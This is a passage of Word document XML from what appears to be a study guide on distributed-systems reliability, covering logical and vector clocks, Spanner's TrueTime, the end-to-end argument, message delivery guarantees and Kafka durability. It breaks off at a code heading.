    <w:p w14:paraId="27F7A581" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If event A causally preceded event B, then A's logical timestamp &lt; B's. (But not the converse — concurrent events may have any ordering.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62950B8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vector clocks (detecting concurrent events):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8D0DB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each node maintains a vector of counters (one per node in the system):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1109E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Node A: [A:3, B:2, C:1] — "I've seen 3 events at A, 2 at B, 1 at C."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E073392" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Comparing two vector clocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55524E64" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>V1 &lt; V2 if all entries in V1 ≤ V2 and at least one is strictly less (V1 happened before V2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519630D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If neither is less → events are concurrent (conflict).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB7747" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> DynamoDB (simplified as version vectors), Riak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B9EDB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Spanner's TrueTime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A1D02" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Provides physical time WITH bounded uncertainty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587D3AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TrueTime.now() returns an interval [earliest, latest] — the true time is guaranteed to be within this interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0A117" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Uncertainty is typically 1–7ms (GPS + atomic clocks in each datacenter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0B1E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>For ordering: if transaction T1's commit timestamp interval doesn't overlap with T2's → you know the real order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77755D0E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If intervals overlap → Spanner waits until they don't overlap ("commit wait") before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FCB22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every transaction must wait for the uncertainty interval to pass (1–7ms). This is the price of global strong consistency with physical time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0CAAA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hybrid Logical Clocks (HLC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8BCA94" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Combines physical and logical clocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E75C1E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Tracks physical time but guarantees logical monotonicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5C841" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If physical clock goes backward (NTP adjustment), HLC continues incrementing logically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA07240" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Provides causal ordering like Lamport clocks, with timestamps close to real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BFF34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> CockroachDB, YugabyteDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A54C4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="4CF94DBA">
          <v:rect id="_x0000_i2943" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2CC1B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. End-to-End Reliability Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCE6AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 The Argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA3D88" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The end-to-end argument (Saltzer, 1984):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43477D92" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability mechanisms placed at lower layers of the system are insufficient. Only the endpoints (application level) can guarantee correct delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A92AD9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD9461" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A file transfer over TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B924D5D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TCP guarantees reliable delivery of bytes between kernel buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AEDA01" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>But: the sender's disk might have silently corrupted the file before sending.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEE1D72" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>And: the receiver's disk might silently corrupt the file after writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC8A62" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TCP's checksums don't protect against these.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85C7FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Only an application-level checksum</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (computed from disk at sender, verified on disk at receiver) provides end-to-end reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D560E73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14.2 Implications for System Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59752DF0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lower-layer reliability is an optimization, not a guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F703A0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TCP's reliability reduces retransmissions (performance win).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70448B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>But you still need application-level acknowledgments for business correctness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61023BF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A message broker's "at-least-once" delivery is infrastructure-level reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC39121" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You still need application-level idempotency for exactly-once processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A37861" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Always design the end-to-end reliability mechanism FIRST (application-level). Then add lower-layer mechanisms as performance optimizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DEF77" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — reliable payment processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE873FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application level:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Idempotency key ensures a payment is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB65686" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service level:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Retries with exponential backoff handle transient failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A223391" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network level:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> TCP handles packet loss transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D20EFD5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical level:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Error-correcting codes on the wire handle bit errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D9405" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each layer improves performance, but correctness is guaranteed by layer 1 alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F447542" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1327AEE4">
          <v:rect id="_x0000_i2944" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60533EF7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Reliability of Queues and Message Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A36956" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Message Delivery Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CFFC1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At-most-once:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BC5E29" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Send the message. Don't track acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A753CF0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Message might be lost. Never duplicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF8832" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Implementation: fire and forget (UDP, non-durable publish).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08CB2A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Use case: Metrics/telemetry where occasional loss is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6704C3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At-least-once:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EAC5E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Send the message. Wait for acknowledgment. If no ack → retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9771FB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Message is never lost. Might be duplicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC903D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Implementation: Durable queue + acknowledgment + retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073636C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Use case: Most business operations (combined with idempotency for exactly-once effect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E00FC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exactly-once (effectively):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC990C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>At-least-once delivery + idempotent consumer = exactly-once processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3A2BE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The message may be delivered multiple times, but its EFFECT happens once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16473050" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Implementation: Idempotency keys, transactional consumers, deduplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44152602" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Durable Message Storage — How Queues Don't Lose Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FF65C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka's durability model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B2D3E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A message is written to the partition leader's WAL on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66838D3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The message is replicated to min.insync.replicas followers (e.g., 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE8F0A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Only after replication does the leader acknowledge to the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125254B8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the leader dies: a follower with the message becomes the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B88C166" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration that ensures zero message loss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48706CDA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
